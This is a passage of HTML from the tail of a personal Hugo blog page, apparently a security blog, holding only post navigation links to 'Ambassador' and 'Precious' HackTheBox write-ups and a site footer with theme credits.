</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/precious/><div class=nav-arrow>Next in series</div><span class=post-title>Precious | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/ambassador/><div class=nav-arrow>Previous</div><span class=post-title>Ambassador | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/precious/><div class=nav-arrow>Next</div><span class=post-title>Precious | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>